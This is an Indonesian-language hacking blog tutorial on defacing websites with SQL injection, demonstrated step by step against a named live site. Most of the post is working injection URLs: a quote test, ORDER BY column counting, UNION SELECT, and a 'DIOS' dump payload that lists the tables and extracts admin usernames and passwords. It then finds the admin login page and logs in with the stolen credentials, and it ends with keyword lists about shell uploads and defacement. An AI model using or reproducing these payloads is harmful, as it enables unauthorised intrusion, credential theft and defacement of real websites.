Kali ini Gw mau Share Tutorial Deface dengan SQLi.
Sebenernya Buanyak bgt.. Ada google kalo mau cari.
Tapi Berhubung Posting gw Kemaren Dork SQLi Jadi gw buat sekalian tutorial Deface nya hehe.. Oke langsung aja.
Pertama elo Donlot dulu HackBar nya , Hackbar Modif
Donlot DISINI (Hubungi kami di fanspage)
Dorknya Elo bisa Pake :
New ! Site Vuln SQL 2017
Kumpulan Site Vuln SQL 2017 - Bag.2
Untuk Menutup & Membuka Hackbar Tekan f9.Dan Gw Disini Udah dapet Target.
http://www.facialbaronline.com/services.php?p=1Langsung tambahkan ['] di belakang URL
http://www.facialbaronline.com/services.php?p=1'Lalu execute..
Kalo Vuln Biasanya Akan Seperti itu
Ada tulisan mysql_error()
Setelah itu Tambahkan [-] di depan ANGKA 1. Pada HackBar Pilih
UNION BASED > COLUMN COUNT > ORDER BY
Jadi Seperti ini
http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+1--+
Pada Gambar Diatas Tidak Error & Sekarang Kita cari Error nya
Atau Batas Column nya.
Caranya
> +ORDER+BY+1--+ urutkan dari 1 sampai ketemu error/ batas column. jadi Seperti ini
http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+1--+
http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+2--+
http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+3--+
http://www.facialbaronline.com/services.php?p=-1+ORDER+BY+4--+
Daan Seterusnya...
Web Target Gw Disini Berarti Column nya cuma sampe 9. Jadi Langsung ke Hackbar lg..
Pilih di Hackbar..
UNION BASED > UNION STATEMENT > INT,INT
Akan muncul popup.. Seperti ini, Karena Column web Gw 9.
Tulis Angka 9 Nanti Hackbar akan memberikan Perintah UNION.
Jangan lupa tambakan [--+] di belakang URL
Jadi Seperti ini
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+
Muncul Angka Ajaib.. Nanti Angka ini yg akan kita inject untuk Mendapatkan Datanya.
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--+
Jadi Pilih Yang No 2
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,[Ini di ganti pake Dios Madblood],3,4,5,6,7,8,9--+
Di Hackbar.. pilih.
UNION BASED > DIOS MYSQL >> DIOS BY MADBLOOD
Jadinya Seperti ini
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+
Disini Udah kliatan Semua Tables nya. Gw juga Udah Nemu Column Username + Password nya.
Cara Mendapatkan Datanya.
information_schema.columns Diganti Dengan Admin
table_name Diganti menjadi Username
column_name Diganti Menjadi Password
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+ Jadinya kek gini..
http://www.facialbaronline.com/services.php?p=-1+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(Admin)where@:=export_set(5,export_set(5,@,username,0x3c6c693e,2),password,0xa3a,2)),@,2)),3,4,5,6,7,8,9--+
Itu Username & Passwordnya
Setelah dapet Username + Password..Bingung cari admin login nya ?
Kemaren gw sempet Post Mencari Login admin Dengan CMD di Windows. Langsung cek cara lengkapnya
Ga ada 1 menit langsung Ketemu...
Halaman Login nya ada di.. http://www.facialbaronline.com/administrator/
Langsung Masuk pake User + Pass yang tadi
Oke Terima kasih.. Sampe jumpa di tutorial selanjutnya
cara deface pemula,
cara deface dengan mudah,
cara hack website,
cara upload shell,
cara deface dengan bypass admin,
cara deface dengan jumping,
cara upload shell ke magento,
cara deface dengan magento,
cara deface dengan wordpress,
cara upload shell di wordpress,
trik deface dengan mudah,
cara menjadi hacker,
hacker paling berbahaya
Cara deface dengan SQL.
berita teknologi|hacked by | di hack oleh|anonymous|peretas|info teknologi|web kab|di retas|hacker|di deface|defacer|zone-h|motif